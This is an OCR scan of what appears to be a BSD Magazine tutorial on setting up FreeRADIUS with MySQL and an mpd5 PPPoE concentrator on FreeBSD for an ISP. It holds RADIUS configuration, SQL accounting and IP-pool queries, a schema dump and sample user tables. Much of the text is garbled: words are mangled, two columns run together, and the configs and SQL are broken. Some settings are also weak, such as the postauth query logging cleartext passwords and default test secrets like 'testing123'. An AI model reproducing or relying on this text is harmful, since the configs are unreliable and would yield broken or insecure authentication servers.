sgqltracefile = ${logdir}/sqltrace.sql enable = no 
num sql socks = 30 Prtetime = 24 4 hours 
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max entries = 255 


verify { 
} 
} 
tele { 
detauluveapytype = mds 
COPY Sequesr ro peunnel = me 
Wists Tewonelerel iecjolly = jake) 
ViPpEUal server — | Iimerbuniel 
} 
peap { 
default eap type = mschapv2 
Copy bequcsrE EO erunnel = me 
Wise Telecel etel iecjolly = jave) 
Vipevalysenvers— liner slunne. 
} 
mschapv2 { 
} 
} 
#eof 


fo Va / Uist /local/ete, raddb,/ proxy. cont 


proxy server { 


default taltoack = ne 


roils scieveis Ioceliaosic || 


type = auth 
ipaddne= 17 7730.00 
port = 1812 


secret = testing123 

Scull 1S WMSSsetS cillvinemENeewOe = Wes 
response window = 20 

zombie period = 40 

revive imtrervaly—* 120 

Sleeves! (elaciele — “sieclietlis a skoieticie 

elioe tinue kvcule 30 

num_ answers to alive = 3 

coa { 


irt = 2 


iT 
= 
(o>) 


ignc 


home ysetver Pool my Taulcl tarlover “{ 
type = fail-over 


home server = localhost 


realm example.com { 


aul pool = any auth) faulover 


realm LOCAL { 
} 


#eof 


# vi /usr/local/etc/raddb/policy.conf 


Polley 4 
POLotemeconr 
if (EAP-Message) { 


reject 


} 
pemitvonly veaoy{ 


if ('EHAP-Message) { 


if (!”S{outer.request:EAP-Message}”) { 


reject 


} 


deny «realms { 
if (User-Name =~ /@|\\/) { 


reject 


} 
ClO OW Ss ooine | 
update control { 
Response-Packet-Type := Do-Not-Respond 


handled 
} 


OU val wlaeieh as 4h 
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update request { callingstationid = ‘’, username = ‘’, \ 
Chargeable-User-Identity:=’ \\000’ expiry time = NULL \ 
} WHERE expiry time <= NOW() - INTERVAL 1 SECOND \ 
} AND nasipaddress = ‘%{Nas-IP-Address}’” 
Cul POstaurm { 
if (FreeRadius-Proxied-To == 127.0.0.1) { allocate-find = “SELECT framedipaddress FROM ${ippool table} \ 
if (outer.request:Chargeable-User-Identity) { WHERE pool name = ‘%{control:Pool-Name}’ \ 
update outer.reply { ORDER BY (username <> ‘%{User-Name}’), \ 
Chargeable-User- (caMingstatvonte 7) 21 Calling -starvon—Lay, jaan. 
Identity;="<{md52c{contig:cul hash key}<{User—Name} |” expiry time \ 
} GAUCHE SASS 
} FOR UPDATE” 
} 
else { pool-check = “SELECT id FROM ${ippool table} \ 
if (Chargeable-User-Identity) { WHERE pool name='%{control:Pool-Name}’ LIMIT 1” 
update reply { 
Chargeable-User- allocate-update = “UPDATE ${ippool table} \ 
identivy=".{mds. > (Conlg: eum hash key) «| UsersName; |” PU Mee lpaddbese =o NRo- le Address |. O0Cl key — 
} ‘S{pool-key}’, \ 
} callingstationid = ‘%{Calling-Station-Id}’, username = 
} ‘${User-Name}’, \ 
} expiry time = NOW() + INTERVAL ${lease-duration} SECOND \ 
eum updaredb { WILKE “itaticdipaderess = ol AND expiry tine le NUE” 
if (reply:Chargeable-User-Identity) { 
eum start-update = “UPDATE ${ippool table} \ 
} SET €xpiry time = NOW() + INTERVAL 5{léasé-duration} 
} SECOND \ 
Ciaac count ung sf WHERE Mastpaddress = “s|NAS-1P-Address|* AND pool key 
if (!Chargeable-User-Identity) { = ‘S{pool-key}’ \ 
update control { AND username = ‘%{User-Name}’ \ 
Chargable-User-Identity := “%S{cui: SELECT AND calllingstatrionid = *2(Caliling—Station-ld) \ 
Cui FROM cul WHERE clientipaddress = ‘%{Client-IP- AND framedipaddress = ‘%{Framed-IP-Address}’” 
Address}’ AND callingstationid = ‘%{Calling-Station- 
Id}’ AND username = ‘%{User-Name}’ }” stop-clear = “UPDATE ${ippool table} \ 
} Si Mesipaddress —— 7 pceluke).— 0 cal lingetationrd. — 
} username = “’, \ 
if (Chargeable-User-Identity && (Chargeable-User- expiry time = NULL \ 
Identity != “”)) { WHERE adstpacddness.= > Ndas-1P-nddness) “All pool key =| 
en 1 eOol=Key | 
} AND username = ‘%{User-Name}’ \ 
} Mi callibiagstatiomic |. Calling oration ley)! \ 
} AND framedipaddress = ‘%{Framed-IP-Address}’” 
#eof alive-update = “UPDATE ${ippool table} \ 
SBT expiry time — NOW() + INTERVAL 3{léase-duraction} 
i Vil yuisr/ locally etc, raddb/ sql mysql 19 peo cont SECOND \ 
NEBR ade teaddress == — so) Nas—- be -nddress | AND pcoltke) = 
allocate-clear = “UPDATE ${ippool table} \ ‘S{pool-key}’ \ 
SET nasipaddress = ‘’, pool key = 0, \ AND username = ‘%{User-Name}’ \ 


BSD 


MAGAZINE 


www.bsdmag.org 


ANDecallingstatvonid = “siCalling=-Station-1da\ % 
AND framedipaddress = ‘%{Framed-IP-Address}/” 


on=cléar = “UPDATE S{ippool table} \ 
DEP Mastpaddtesss —  )  POOlE Key —sU ca Le Ingsraslonte s— 
‘ username = ‘7, \ 
expiry time = NULL \ 
WHERE nasipaddress = ‘%{Nas-IP-Address}/” 


Cbr-cllear = UBDATE ]{ippool table) 
Sil Was tpad¢ ress) ieooh Key = Upeal PiigeGan Onis 
we username = “4, \ 
expiry time = NULL \ 
WHERE nasipaddress = ‘%{Nas-IP-Address}/” 


#eof 
ivi /Uisr/Mocal/etc/ caddb/ sql/mysql/dalalup.cont 


sql user name = “<{User-Name}” 


Nasequery —— SELECT id, tasiame, shortimeame, type, 


SC se, Sioieveic NOM oi ieisiccliele |” 


elle Menem, Acr Teltetel< ofblengy, 3 SIINING IN aol, = Disisiaine lies “elieio i l= 
bute, value, op \ 

HROM > aurneneck table}; \ 

WHERE username = ‘%{SQL-User-Name}’ \ 

CORDES Bic” 
euNOnI Ze Tuep ly teulery =] Selec L 1d, iseriance,, altel — 
bute, value, op \ 

BROMe (QUEnMep ly cable; =. 

WHERE username = ‘%{SQL-User-Name}’ AND attri- 
bute <> ‘Garantia’ \ 


ORDER BY id” 


group membership query = “SELECT trim(groupname) as 
groupname \ 

BROM = (Usergroup. cable; 

WHERE username = ‘%{SQL-User-Name}’ \ 

ORDER VB Ve priory 


euiIENOnUZerGLroup Check query = "SELECT ad; 
trim(groupname) as groupname, attribute, \ 
Value, op \ 
BROM >) (Groupcheek table; 
WHERE trim(groupname) = trim(‘%{Sgl-Group}’) \ 
(OUNIDIGIE Jen lle 
euLNoOr ze oEoUp eeply query = SELECT 10; 
trim(groupname) as groupname, attribute, \ 


value, op \ 


FROM ${groupreply table} \ 
WHERE trim(groupname) = trim(‘%{Sgql-Group}’ ) 
alae! Bie imictlomes <s YWelhoeieece! —\ 


ORDER BY ad” 


accounting onoff query = “\ 


UPDATE ${acct tablel} \ 


Ser \ 
acctstoptime = 25>. 
ECectscss TONE ime = Unix cme s tamer cs) 


ae 
unix _ 


timestamp (acctstarttime), \ 


acctterminatecause ‘%{Acct-Terminate- 


Cause}’, \ 


acctstopdelay = %{%{Acct-Delay- 
Time}:-O} \ 
WHERE acctstoptime IS NULL \ 
AND nasipaddress = ‘%S{NAS-IP-Address}’ \ 
AND acctstarttime <= ‘SS'" 


accounting update query =“ \ 
UPDATE (occu ea lel i) 
SL 
framedipaddress = ‘%{Framed-IP-Address}’, \ 
acctsessiontime = ‘%{Acct-Session-Time}’, \ 
acctinputoctets = ‘${%{Acct-Input-Giga- 
Words |! —0N  =<25 37 | 
Too pene Ce apie 
Octets}:-0}’, \ 
accCtoutcpuLtoctets = ‘S${%{Acct-Output- 
Gigawords}s=07" << 32 | \ 
eo Lo CCE — OUD 
Octets}:-0}’ \ 


WHERE acctsessionid = ‘%{Acct-Session-Id}’ \ 


AND username = ‘${SQL-User-Name}’ \ 
AND nasipaddress = ‘%{NAS-IP-Address}/” 


accounting update query alt =“ \ 


INSERT INTO ${acct tablel} \ 


(acctsessionid, acctuniqueid, username, \ 
realm, nasipaddress, nasportid, \ 
nasporttype, acctstarttime, acctsessiontime, \ 
acctauthentic, connectinfo start, acctinputoctets, \ 


acctoutputoctets, calledstationid, callingstationid, \ 


servicetype, framedprotocol, framedipaddress, \ 
acCrescarucelay, xascendsessionsvrkey) \ 
VALUES \ 


(s{(ACCiosession—-ld) cs (Acci—Umigie-ses— 
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Son UGi 7... Mie Oe Oi ae, 

‘3{SOL-User-Name}’, \ ve colled-station-la}"  “o{ea ling scacton— 
‘S${Realm}’, ‘%S{NAS-IP-Address}’, ‘%{NAS- lie) ramen rae 
Reseed 3 *3{(Service-Type}’, *c{Framed-Protocol }’, 
To NAS Port lvoe) a \ ‘3{Framed-IP-Address}’, \ 
DATE SUB( ss) > \ M1 oACee- Delay lime jr —-O}" 0" | 
INTERVAL (%{%S{Acct-Session- ‘S{X-Ascend-Session-Svr-Key}’)” 
Time}:-0} + \ 
6{%{Acct-Delay- eCCOMonc ing Steliee Cleiny ellie 4 | 
Lime} =O} seconpie. UPDATE, Siacet. Cabléel) Shr x 
‘3{Acct-Session-Time}’, \ acctstarttime =o oe 
“2iAcect—-Authentic}’, *’, \ acctstartdelay = ‘%{%{Acct-Delay- 
Vest Nee eno tle SE ieeieiccls SSO) G< S24 \ Time}:-0}', \ 
Totes eCe Input Oeteten 07 ma connectinfo start = ‘%{Connect-Info}’ \ 
tet cee OU put Grcawomds | si << 93 25 WHERE acctsessionid = ‘%{Acct-Session-Id}’ \ 
Coc eCe OUpU OctCts Oil. AND username = ‘%{SQL-User-Name}’ \ 
Vo Called ostarron—ld) 21 Ca linge sta AND nasSipaddress = ‘${NAS-IP-Address}/’” 
EROm— ice 
Ve oCh Ge ype)’. o\Huamed Prorocell| 7 \ ACeCOUMPI NG NS EOe query s——) )\ 
‘3{Framed-IP-Address}’, \ UPDATE ${acct table2} SET \ 
‘O', ‘s{X-Ascend-Session-Svr-Key}’)” acctstoptime = ‘8S’, \ 
acctsessiontime = ‘${Acct-Ses- 
accounting start query = “ \ Soni Eiiies| an 
INSERT INTO ${acct tablel} \ aceceinpuLcocters = ‘${%{Acct-Input-Giga- 
(acctsessionid, acctuniqueid, WOoros ) y= 02a 32 i| 

username, \ See tACer- impute = 

realm, nasipaddress, Ocbe ot en. 

ia Ooi. | acctoutputoctets = “G1 61 RCCL -OULpUL-GiGa= 

nasporttype, acehsStarr tl Lime, Words t=) aero a a\ 

acctstoptime, \ “S41 341 ACCE—-OUtpuE— 
acctsessiontime, acctauthentic, Con Octets}:-0}', \ 

Mee Dito pSiearaia an aCe bUerimMnaeecallscr— |) 5 Neel Lemimiaue= 
COnnecT InGoOUSrCo, acer mouOebete, Cause}’, \ 

acCCLOUTpULOCEEtES, \ acctstopdelay = ‘%{«{Acct-Delay- 
Cabledsctattonid,, “ca llingstretrvonicd, acer Time}:-0}', \ 

terminatecause, \ connectinfo stop = ‘%{Connect-Info}’ \ 
servicetype, framedprotocol, frame- WHERE acctsessionid = ‘${Acct-Session-Id}’ \ 

dipaddress, \ AND username = ‘%{SQL-User-Name}’ \ 
acctstartdelay, acctstopdelay, Mas = AND nasipaddress = “s{NAS-1P-Address},” ” 

cendsessionsvrkey) \ 
VALUES \ AUS COUONC LNG SC culty cle = | 
(Meee secctOna id) 7a 3 ect Uimeme- INSERT INTO ${acct table2} \ 

Session-Id}’, \ (acctsessionid, acctuniqueid, username, \ 
‘3{SQL-User-Name}’, \ realm, nasipaddress, nasportid, \ 
‘S${Realm}’, ‘s{NAS-IP-Address}’, ‘%S{NAS- nasporttype, acctstarttime, acctstoptime, \ 

Poreh!.-\ acctsessiontime, acctauthentic, con- 
‘“S{NAS-Port-Type}’, ‘2S’, NULL, \ NecrIimrO scart, 

“UO > “so ACeCr-Auchenticl” = “2 (Connecr— GOMneclintows Lop, -dAceuinpilLochets, acerour— 

Paneer putoctets, \ 
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calledstationid, callingstationid, acctter— 
Minatecause, \ 
servicetype, framedprotocol, framedi- 


paddress, \ 
acctstartdelay, acctstopdelay) \ 
VALUES \ 
(“Ss ACCE-session-id}”,. “s{Acet-Unique—-ses— 
sion-Id}’, \ 
‘${SQL-User-Name}’, \ 
‘S${Realm}’, ‘s{NAS-IP-Address}’, ‘%S{NAS- 
Port}';, \ 
‘${NAS-Port-Type}’, \ 


DATE SUB(‘%S’, \ 


INTERVAL (913 {(ACeCc-sesston—lime}:—0) + 
\ 
Sto CCl Delay — hime | 2-0) oh COND) ea: \ 
eo) One Cr-oeSetOn-l ime), vol Acer. 


POMElaySIane SY 
‘3{Connect-Info}’, \ 
Weleie= I nloWle Eile yieiccls +S 0)" << S27 | 
INGICE= Lacie =O ESS 2 0 
ACCe OU pul Groawords }s—0)\ <- 37/5 


a 
ole 
“a “~_ “_ “~_ “a 
fo\\e} 
“_ “~_ “~_ 


‘2 {S{Acct-Output-Octets}:-0}’, \ 

Ve Called=Statidion-la)\i. “2, Calling-cta- 
tion-Id}’, \ 

‘${Acct-Terminate-Cause}’, \ 

‘${Service-Type}’, 
‘${Framed-IP-Address}’, \ 


WO) ; 


21 Eb tamed-Prorocol |”; 


‘3{%{Acct-Delay-Time}:-0}')” 


Simul Coun quccry — “SELECT COUNT (=) 

HROMP > eacce tablelt. | 

WHERE username = ‘%{SQL- 
User-Name}’ \ 

AND acctstoptime IS NULL” 
acctsessio- 


Samui verity query. == SanECY cadaceuid, 


nid, Username, 
naSipaddress, nasportid, 

framedipaddress, \ 

callingstationid, framed- 
protocol \ 

BROMP acct tab lel. 

WHERE username = ‘%{SQL- 
User-Name}’ \ 


AND acctstoptime IS NULL” 


POstauth query = INSERT INTO S{posvaut table} \ 


(username, pass, reply, 


authdate) \ 
VALUES ( \ 
‘${User-Name}’, \ 
‘3{%{User-Password} :-%{Chap- 
Password}}’, \ 


“eo reply: Packet-Type}’, “*ss’)” 


#eof 


# /usr/local/etc/raddb/sites-enabled/control-socket 
listen { 
type = control 


socket = S${run_ dir}/S${name}.sock 


#eof 


te/ use) local) eucy raddbh/ Sites ena led/ immer—cummnel 


server inner-tunnel { 


listen { 
i eysKoislian — a alZag) 1010s A 
port = 18120 
type = auth 
} 
authorize {f{ 
chap 
mschap 
suffix 
update control { 
Proxy-To-Realm := LOCAL 
} 
eap { 
ok = return 
} 
files 
expiration 
logintime 


Pap 


authenticate { 


Auth-Type PAP { 
Pap 


Auth-Type CHAP { 
chap 
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} } 
Auth-Type MS-CHAP { Auth-Type MS-CHAP { 
mschap mschap 
} } 
unix digest 
eap } 
} 
session { preacct { 
radutmp preprocess 
} acct unique 
suffix 
SOs eilcln 4 files 
Post-Auth-Type REJECT { } 
Eueie WUceie cis IS See 
} accounting { 
} detail 
Suk 
pre-proxy { exec 
} pet hee acc oUMetne mmc Ole 
sqitippoo! 
SOS IC oieov<y) || } 
eap 
} session { 
Sql 
} } 
#eof post-auth { 
exec 
# /usr/local/etc/raddb/sites-enabled/default Post-Auth-Type REJECT { 
aulthourze || ILS WLhbeie eCCSss cS yect 
preprocess } 
chap sqlippocl 
mschap } 
sroill 
expiration pre-proxy { 
logintime } 
Pap 
} POSE Ouex ya 
eap 
authenticate { } 
Auth-Type PAP { 
pap #eof 
} 
Auth-Type CHAP { 
chap 
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Listing 9. 


# cat radius nodata.sql 


/*'40101 SET @OLD CHARACTER SET CLIENT=@@CHARACTER SET_ 


CLIENT */; 

/*!40101 SET @OLD CHARACTER SET RESULTS=@@CHARACTER SET_ 
RUSS ULES, wt! & 

/*'!40101 SET @OLD COLLATION CONNECTION=@@COLLATION CON- 
NECTION */; 


/*140101 SET NAMES utf8 */; 

/*'40103 SET @OLD TIME ZONE=@@TIME ZONE */; 

/*140103 SET TIME ZONE='+00:00' */; 

/*'40014 SET @OLD UNIQUE CHECKS=@@UNIQUE CHECKS, UNIQUE 
CHECKS=0 */; 

/*'!40014 SET @OLD FOREIGN KEY CHECKS=@@FOREIGN KEY_ 
CHECKS, FOREIGN KEY CHECKS=0 */; 

/*'40101 SET @OLD SQL MODE=@@SQL MODE, SQL MODE=’NO_ 
AUTO VALUE ON ZERO’ */; 

/*'40111 SET @OLD SQL NOTES=@@SQL NOTES, SQL NOTES=0 */; 


-- Table structure for table “nas” 


DROP TABLE IF EXISIES 
/*140101 SET @saved_cs_ client 


eines. 


@@character set_ 
Client */; 
/*140101 SET character set client = utf8 */; 
CREATE TABLE 
“id* int(10) NOT NULL AUTO INCREMENT, 


“nasname’ varchar(128) NOT NULL, 


“nas” ( 


~shortname” varchar(32) DEFAULT NULL, 

“type varchar(30) DEFAULT “other’ , 

ports ant (>) DEFAULT NULLy 

“secret varchar(60) NOT NULL DEFAULT ‘secret’, 
“community  varchar(50) DEFAULT NULL, 


“description varchan(200) DEFAULT “RADIUS Clivenc’ | 
PRIMARY KEY (‘id*), 


/*'40101 SET character set client = 
CREATE TABLE 
“RadAcctid° bigint (21) NOT NULL AUTO INCREMENT, 

“AcctSessioniId varchar(32) NOT NULL DEFAULT *’, 


in oeeey 


‘wadacer i 


“AcctUniquelId varchar(32) NOT NULL DEFAULT °‘’, 
“UserName” varchar(64) NOT NULL DEFAULT °’, 
“Realm varchar(64) DEFAULT ‘’, 
“NASIPAddress’ varchar(15) NOT NULL DEFAULT °‘’, 
“NASPortId° varchar(15) DEFAULT NULL, 
“NASPortType’ varchar(32) DEFAULT NULL, 
“AcctStartTime datetime NOT NULL DEFAULT 
HOR OC Ch Ose 
“acctstoptime datetime DEFAULT NULL, 
“AcctSessionTime’ int(12) DEFAULT NULL, 
“AcctAuthentic’ varchar(32) DEFAULT NULL, 
VCOMNSCEIMEOyStare “varchar (50) DEPAULT NUE, 
‘CoOmmecEINEORS Lop “varchar (50) 9 DEFAULT NULL; 
“AcctInputOctets”> bigint(12) DEFAULT NULL, 
ACCEOULPULOCrersS “bigimu(1Z) DEFAULT NUGh, 
*CalledStationId° varchar(50) NOT NULL DEFAULT °’, 
Callingstationtd varchar(50) NOL NULL DEPAULT ~~”; 


“AcctTerminateCause varchar(32) NOT NULL DEFAULT °‘’, 


*ServiceType’ varchar(32) DEFAULT NULL, 
*FramedProtocol’ varchar(32) DEFAULT NULL, 
*FramedIPAddress” varchar(15) NOT NULL DEFAULT °’, 
“AcctStartDelay> int(12) DEFAULT NULL, 
“AcctStopDelay*> int(12) DEFAULT NULL, 
*xascendsessionsvrkey varchar(10) DEFAULT NULL, 
PRIMARY KEY ( RadAcctId°), 

KEY 


‘UserName’ (° UserName’), 


KEY ~“FramedIPAddress’ (°FramedIPAddress’), 


KEY “AcctSessionId (°AcctSessionId°), 


KEY “AcctUniqueld* (°‘AcctUniqueld’), 


KEY “AcctStartTime (°‘AcctStartTime-), 


KEYS Aeecesroplime V( accestocreime 
“NASIPAddress~ (°NASIPAddress ) 
) ENGINE=InnoDB AUTO INCREMENT=22301255 DEFAULT 


CHARSET=latinl1; 


eGieh 


“OIDUO= 00-00 


KEY acta Si teacmam= ) /*!140101 SET character set client = @saved_cs client */; 
) ENGINE=InnoDB DEFAULT CHARSET=latinl; 
/*!40101 SET character set client = @saved_cs client */; ae 
== elle Siecbieircs secs tcalols “iceyclolneicl. 
== Welle Seiwle tbe els eles “ieerclerceic 
i DROP TABLE IF EXISTS ‘“radcheck’; 
/*140101 SET @saved_cs client = @@character set_ 
DROP FABLE EX TSS. Gacdacee | Client */ 
/*!40101 SET @saved_cs client = Ilelisticcicineie Sis /*'40101 SET character set client = utf8 */; 
client, */> CREATE TABLE radcheck ( 
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Sid) ine (hl) unsigned NOT NUL: AUTO INCREMENT, CHARSET=latinl; 

“UserName varchar(64) NOT NULL DEFAULT ‘’, /*'40101 SET character set client = @saved_cs client */; 
“Attribute varchar(32) NOT NULL DEFAULT °*’, 

‘op’ char(2) NOT NULL DEFAULT ‘==', is 

“Value” varchar(253) NOT NULL DEFAULT *’, =— labile serucuiikestor table Gaduppood: 

‘Bloqueado* tinyint(1) NOT NULL DEFAULT ‘0’, se 

PRIMARY KEY (‘id*), 


KEY “UserName” (UserName (32)) DROP TABLE IF EXISTS radippool | 
) ENGINE=MyISAM AUTO INCREMENT=20876 DEFAULT /*140101 SET @saved_cs_ client = @@character set_ 
CGHARSET=latinl: elven 7. 
/*140101 SET character set client = @saved_cs client */; /*!40101 SET character set client = utf8 */; 


CREATE TABLE “radippool’ ( 
i ~“id* int(11) unsigned NOT NULL AUTO INCREMENT, 
== Vable structure for table radgroupcieck “pool name* varchar(30) NOT NULL, 
== “framedipaddress~ varchar(15) NOT NULL DEFAULT ‘’, 


“nasipaddress’ varchar(15) NOT NULL DEFAULT °‘’, 
DROP TABLE IF EXISTS “radgroupcheck’ ; "callleceitatwonid Vvarchae(s0) NOD NUI, 
/*140101 SET @saved_ cs client = @@character set_ ‘callingstationid varchar(60) DEFAULT NULL, 
client */; “expiry time datetime DEFAULT NULL, 
/*!40101 SET character set client = utf8 */; “username varchar(64) NOT NULL DEFAULT \’, 
CREATE TABLE “radgroupcheck ( “pool key” varchar(30) NOT NULL, 
"id? ime (Liye unsrgned NOT eNUinL: AUTO INCREMENT, PRIMARY KEY (id), 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, IE ieerelijsjerereul jseouinciils gous (| jeorell ioreline  ,  eeqouliey/ 
“Attribute” varchar(32) NOT NULL DEFAULT °*’, time’), 
“op” char(2) NOT NULL DEFAULT ‘==’, KEY ~“framedipaddress’ (°framedipaddress’), 
“Value varchar(253) NOT NULL DEFAULT °‘’, KEN ici pp eel enccipmpoOel kc) stpaddnece. 
PRIMARY KEY (id°*), (“nasipaddress’, pool key’, framedipaddress ) 
KEY “GroupName” (°GroupName’ (32)) ) ENGINE=InnoDB AUTO INCREMENT=994 DEFAULT 
) ENGINE=MyISAM AUTO INCREMENT=250 DEFAULT CHARSET=latinl; 
CHARSET=latinl; /*!140101 SET character set client = @saved_cs client */; 


/*140101 SET character set client = @saved_cs client */; 


-- -- Table structure for table ‘radpostauth~ 


== Kable structure for table ~radqroupreply == 


DROP TABLE IF EXISTS “radpostauth ; 


DROP TABLE IF EXISTS “radgroupreply ; /*140101 SET @saved_ cs client = @@character set_ 
/*140101 SET @saved_ cs client = (Cchacacreie seic_ client */; 
client */; /*'40101 SET character set client = utf8 */; 
/*'40101 SET character set client = utf8 */; CREATE TABLE ‘radpostauth” ( 
CREATE TABLE “radgroupreply” ( “id* int(11) NOT NULL AUTO INCREMENT, 
“id* int(11) unsigned NOT NULL AUTO INCREMENT, “user” varchar(64) NOT NULL DEFAULT ‘’, 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, ‘pass’ varchar(64) NOT NULL DEFAULT ‘’, 
“AGT Eibubke Varchar(s2) NOM NUL DEFAULT 7 “‘“eply varchar(s2) NOT NULIy PERAUED ~" > 
‘op’ char(2) NOT NULL DEFAULT ‘=’, ‘date timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON 
“Value* varchar(253) NOT NULL DEFAULT ‘’, UPDATE CURRENT SIME S TAME, 
PRIMARY KEY (‘id*), PRIMARY KEY (*id*) 
KEY ~GroupName’ (°GroupName’ (32)) ) ENGINE=MyISAM AUTO INCREMENT=5673695 DEFAULT 
) ENGINE=MyISAM AUTO INCREMENT=492 DEFAULT CHARSET=latinl; 
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/*'40101 SET character set client = @saved_cs client */; 
DROP TABLE IF EXISTS “velocidades -; 
ae /*'40101 SET @saved_cs client 


@@character set_ 
== Waves Se hUGCkUmer DOr dave wadneoly eclvenis 7 - 
-- /*!40101 SET character set client = utf8 */; 

CREATE TABLE ‘velocidades’ ( 


DROP TABLE IF EXISTS “radreply ; kel shone UI)) SNIOME NIUE 
/*!40101 SET @saved_ cs client = ielelorstiecioicie sion “vdown’ int(11) NOT NULL, 
client */; bie Sore (IID IONE IU IEIL; 
/*!40101 SET character set client = utf8 */; PRIMARY KEY (*id*) 
CREATE TABLE ‘radreply ( ) ENGINE=InnoDB DEFAULT CHARSET=latinl; 
“id” int(11) unsigned NOT NULL AUTO INCREMENT, /*'40101 SET character set client = @saved_cs client */; 
“UserName” varchar(64) NOT NULL DEFAULT °’, /*'40103 SET TIME ZONE=@OLD TIME ZONE */; 
“Attribute” varchar(32) NOT NULL DEFAULT °‘’, 
‘op char(2) NOT NULL DEFAULT ‘=’, /*!40101 SET SQL MODE=@OLD SQL MODE */; 
“Value” varchar(253) NOT NULL DEFAULT *’, /*140014 SET FOREIGN KEY CHECKS=@OLD FOREIGN KEY CHECKS 
PRIMARY KEY (‘id*), */; 
KEY “UserName* (*UserName~ (32)) /*140014 SET UNIQUE CHECKS=@OLD UNIQUE CHECKS */; 
) ENGINE=MyISAM AUTO INCREMENT=27136 DEFAULT /*'40101 SET CHARACTER SET CLIENT=@OLD CHARACTER SET_ 
CHARSET=latinl; Clint 7; 
/*'40101 SET character set client = @saved_cs client */; /*'40101 SET CHARACTER SET RESULTS=@OLD CHARACTER SET_ 
a SUIIES Y/y 


== /*'!40101 SET COLLATION CONNECTION=@OLD COLLATION CONNEC- 
= cole Sthlcwilses tor tccblem Usereuouip ON a): 
-- /*!40111 SET SQL NOTES=@OLD SQL NOTES */; 


DROP TABLE IF EXIsts usergroup ; =—- ume <comoleted on 20 4-0-2050 22.54 703 

/*140101 SET @saved_cs_ client 
client */; 

/*140101 SET character set client = utf8 */; 

CREATE TABLE “usergroup ( 


@@character set_ 


“UserName” varchar(64) NOT NULL DEFAULT °’, 
~“GroupName’ varchar(64) NOT NULL DEFAULT ‘’, 
Priority ine) Nor NULL DEPAUL “is, 
KEY “UserName” (° UserName’ (32) ) 

) ENGINE=MyISAM DEFAULT CHARSET=latinl; 


/*140101 SET character set client = @saved_cs client */; 


== Table structure for table velocidades 


Listing 10. 


iowa (OC) mesh) eubNer pzeduney = 

ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQODPVC3ksxLRuHPcknfskNhXxxhtrgfq40904T/wJsrP1lETgQMmjg3kbHDbszeAio/y7au2rORRWSadmQ 
R517dQhBI0qdWF5Zp+SbBfebik7 rmJeoTCpESQySH9KM/nBsDx914+UiDogkQziQJtkI IRoux8nZgLc5JJkzcj £00MS7pQ4LzISmDCDJQ75VsG00QZ 
aQ0du40lvngj]x8fMvk182rCkhYaMUhbhR1njBvhNSWnfOY51FpO0ocbiOSMGym4pHOEJNWHiQHLtVKY+1D5peA03UM1il7rz1lZkQWLFCaAvJlaEXlasw3 
ylW7/AzvCVas 6uKyutet4GYYSUoD3vVXAbUZ root@valhalla.connectionlost.com.br 
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Insert examples of functional client: These entries con- 
trol concurrent access, user and password (Listing 11). 

lf using pap, use the Password attribute and if you use 
chap, use ClearText-Password attribute. 

Here we address the control pool of dynamic IPs, the 
warranty, the address that will be delivered v4 and v6 ad- 
dress prefix. We note that if we have the Framed-IP-Ad- 
dress, it will be prioritized and this field will not exist; the 
addressing will be done through the pool of IPs (Listing 12). 

Here we register the customer's plans: Listing 13. 

Here we will make the link between the user and the 
contracted plan: Listing 14. 

The registration address of our pool of IPs can be public 
or private: Listing 15. Now start the services and we have 
a server ready to use! 

Let's start authenticating clients! =D 

Now we will do the PPPoE concentrator. 

On a machine with newly installed Freebsd, we will not 
cover the installation in question. It is a generic installa- 
tion, but leave a space in /var for logs. 

Edit rc.conf with some settings and startup daemons 
(Listing 16). 

A tip: if you are experiencing a very high CPU consump- 
tion and instability, disable tso, Iro, hwcsum and txcsum. 
Not much impact on performance and quality, but consid- 
erably reduces the processing (Listing 17). 

We will install the necessary packages: 

Install mpd5 on your freebsd: 


€ 


Multi-link PPP Daemon for FreeBSD 


Current status summary 


# cd /usr/ports/net/mpd5 


# make install clean 
Install freeradius-client: 


# cd /usr/ports/net/freeradius-client 


# make install clean 
Install bind: 


# cd /usr/ports/dns/bind910 


# make install clean 
Install mysq] client: 


# cd /usr/ports/databases/mysql56-client 


# make install clean 
Install postfix: 


# cd /usr/ports/mail/postfix 


# make install clean 
Install nginx: 


# cd /usr/ports/www/nginx 


# make install clean 


E- ~S Wwe + ff & = 


‘Bund iface = IPEP IPV6CP CCP ECP Link | LEP User siDevice Peer IR 
commen [nite pppoe DOWN 


bonita 
latin 
igbS al 


ig ] bs & 


Starting 


Figure 4. NetFlow date - Traffic on the results 
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Listing 11. 


mysql> use radius 
Database changed 


mysql> select * from radcheck where username=’testuser’ ; 


+------- +------------- $------------------ +----+----------- +----------- + 
| id | UserName | Attribute | op | Value | Bloqueado | 
+------- +------------- $------------------ +----+----------- +----------- + 
| 0S4) |* EESTUSER | Password | == | testpass | Oo 
| OSs) |) ANE SIU IE | Simultaneous-use | := | 1 | 0 | 
+------- +------------- $------------------ +----+----------- +----------- + 


3 rows in set (0.00 sec) 


Listing 12. 


mysql> select * from radreply where username=’ testuser’ ; 


+------- +------------- $-------------------- +----+------------------------- + 
| ake! | UserName | Attribute | op | Value | 
+------- +------------- $-------------------- +----+------------------------- + 
2166 (e 2nE Ss US Ei | Pool-Name | := | main pool | 
[267 |) TRSTUSER | Garantia | == | 20 | 
| 270 pe: S RU SEE | Framed-IP-Address | == | 203.0.113.69 | 
2a 2 | TESlUsER | Pramed=Dev6—Prefx | == (2001 :db3: cate: cate::/64 | 

+------- +------------- +-------------------- +----+------------------------- + 


4 rows in set (0.00 sec) 


Listing 13. 


mysgl> select * from radgroupcheck where trim(groupname)=’ TEST-50MB’ ; 


+----- $--------------------- $------------------ +----+------- + 
| id | GroupName | Attribute | op | Value | 
+----- $--------------------- $------------------ +----+------- + 
| 249 | LESl=50MB | Simultaneous-Use | := | 1 | 
+----- $--------------------- $------------------ +----+------- + 


1 row in set (0.00 sec) 


mysql> select * from radgroupreply where trim(groupname) =’ TEST-50MB’ ; 


+----- +--------------------- +-------------------- +----4------------------------------------------------ + 
| id | GroupName || AGte route | op | Value | 
+----- +--------------------- +-------------------- +----4------------------------------------------------ + 
| 472 9| Test =50MB | Framed-Protocol | := | PPP | 
(473 | TEST=50MB | Service-Type | := | Framed-User | 
| 474 | TEST=50MB | Framed-Compression | := | Van-Jacobsen-TCP-IP | 
| 475 | TEST-50MB | tatjers albanians | += | ian#l=all rate-limit 51000000 9562500 19125000 | 
